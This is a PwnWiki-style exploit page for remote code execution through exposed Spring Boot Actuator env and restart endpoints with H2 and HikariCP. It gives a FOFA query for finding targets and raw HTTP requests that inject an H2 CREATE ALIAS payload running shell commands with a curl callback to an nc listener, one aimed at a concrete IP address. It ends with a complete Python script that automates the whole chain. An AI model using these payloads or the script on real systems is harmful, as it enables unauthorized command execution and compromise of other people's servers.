Spring Boot Actuator H2 RCE Vulnerability
From PwnWiki
Latest revision as of 09:24, 13 June 2021
Affected versions
Spring Boot < 1.5
Spring Boot >= 1.5
Both 1.x and 2.x are affected; what differs is where the endpoints live and whether they are open by default. Spring Boot 1.x serves them at the context root (/env, /restart), and before 1.5 they required no authentication; from 1.5 on they are sensitive by default and only reachable when management.security.enabled=false. Spring Boot 2.x moves them under /actuator/ (the paths used below) and exposes only health and info over HTTP unless management.endpoints.web.exposure.include widens that.
FOFA
body="Whitelabel Error Page"
Exploitation
Preconditions for this chain: H2 is on the target's classpath (the payload is H2 SQL), HikariCP is the connection pool (the property is a Hikari setting), the env endpoint accepts POST, and the restart endpoint is exposed. On Spring Boot 2.x both the POST handler for /actuator/env and the /actuator/restart endpoint are provided by spring-cloud-context, so the target must be a Spring Cloud application with those endpoints enabled. H2 compiles the alias source at runtime, so the target JVM also needs a Java compiler available (a JDK, or Janino on the classpath).
Open the following URL and check that the returned endpoint list includes env and restart:
http://x.x.x.x:port/actuator
Send the following POST request to set spring.datasource.hikari.connection-test-query. The value is H2 SQL: CREATE ALIAS defines a Java function that runs a command and returns the first whitespace-delimited token of its stdout, and CALL EXEC invokes it with a curl to your listener. Replace x.x.x.x:port with the listener address and set Content-Length to the actual size of the body you send.
POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}
Start an nc listener (for example nc -lvnp port), then send a POST request to the /actuator/restart endpoint to restart the application. After the restart HikariCP builds a new pool and runs connection-test-query against H2 to validate connections it hands out, which executes the CREATE ALIAS and CALL EXEC statements and makes the target call back to the listener. Because the query is used for connection validation, the command can fire more than once; if the alias still exists from an earlier attempt, CREATE ALIAS EXEC fails, so use CREATE ALIAS IF NOT EXISTS when re-running the chain. The body is the empty JSON object, so Content-Length is 2.
POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 2

{}
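The procedure above, automated as an added example (this is not PwnWiki's code). It is stdlib-only: it reads the /actuator discovery document and refuses to continue unless env and restart are listed, builds the env body with a Content-Length that matches what is actually sent (the hard-coded lengths in the requests above do not), escapes single quotes in the command for the H2 string literal, and then posts env and restart in order. The target URL, the listener address 10.0.0.1:4444 and the injectable `opener` parameter are assumptions for illustration.

```python
"""Added example for the Actuator + H2 + HikariCP chain on this page; not PwnWiki's code.
Stdlib only. Hosts and ports used here are constructed placeholders."""
import json
import urllib.request

PROPERTY = "spring.datasource.hikari.connection-test-query"

# H2 function alias from the page: runs a command, returns the first token of its stdout.
H2_ALIAS = (
    "CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException "
    "{ java.util.Scanner s = new java.util.Scanner("
    "Runtime.getRuntime().exec(cmd).getInputStream()); "
    "if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; "
)


def sql_quote(value: str) -> str:
    """Escape a value for use inside an H2 single-quoted string literal."""
    return value.replace("'", "''")


def env_property(cmd: str) -> dict:
    """Body for POST /actuator/env: alias definition plus a CALL that runs cmd."""
    return {"name": PROPERTY, "value": H2_ALIAS + "CALL EXEC('" + sql_quote(cmd) + "');"}


def encode(payload: dict) -> tuple:
    """JSON-encode a body and derive headers whose Content-Length matches the bytes sent."""
    body = json.dumps(payload, separators=(",", ":")).encode()
    return {"Content-Type": "application/json", "Content-Length": str(len(body))}, body


def exposed_endpoints(discovery: dict) -> set:
    """Endpoint names in the HAL '_links' object that GET /actuator returns."""
    return set(discovery.get("_links", {}))


def missing_endpoints(discovery: dict) -> list:
    """Which of the endpoints this chain needs are not exposed."""
    return [name for name in ("env", "restart") if name not in exposed_endpoints(discovery)]


def run_chain(base_url: str, cmd: str, opener=urllib.request.urlopen) -> list:
    """Check discovery, set the property, trigger the restart.
    Returns the HTTP status of each POST (None if the restart dropped the connection).
    `opener` is injectable so the flow can be driven without a live target."""
    base = base_url.rstrip("/")
    with opener(base + "/actuator", timeout=10) as resp:
        discovery = json.load(resp)
    missing = missing_endpoints(discovery)
    if missing:
        raise RuntimeError(f"chain not possible, endpoints not exposed: {missing}")
    statuses = []
    for path, payload in (("/actuator/env", env_property(cmd)), ("/actuator/restart", {})):
        headers, body = encode(payload)
        req = urllib.request.Request(base + path, data=body, headers=headers, method="POST")
        try:
            with opener(req, timeout=30) as resp:
                statuses.append(resp.status)
        except OSError:
            # A restart often closes the socket before replying; a failed env POST is fatal
            # because nothing would execute after the restart.
            if path == "/actuator/env":
                raise
            statuses.append(None)
    return statuses


if __name__ == "__main__":
    # Constructed placeholders: target, and the attacker's listener started with nc -lvnp 4444.
    print(run_chain("http://127.0.0.1:8080", "curl 10.0.0.1:4444"))
```

Start the nc listener before calling run_chain; the returned list shows whether the env POST was accepted and whether the restart replied or simply dropped the connection, and the callback on the listener is the confirmation that the H2 statements ran.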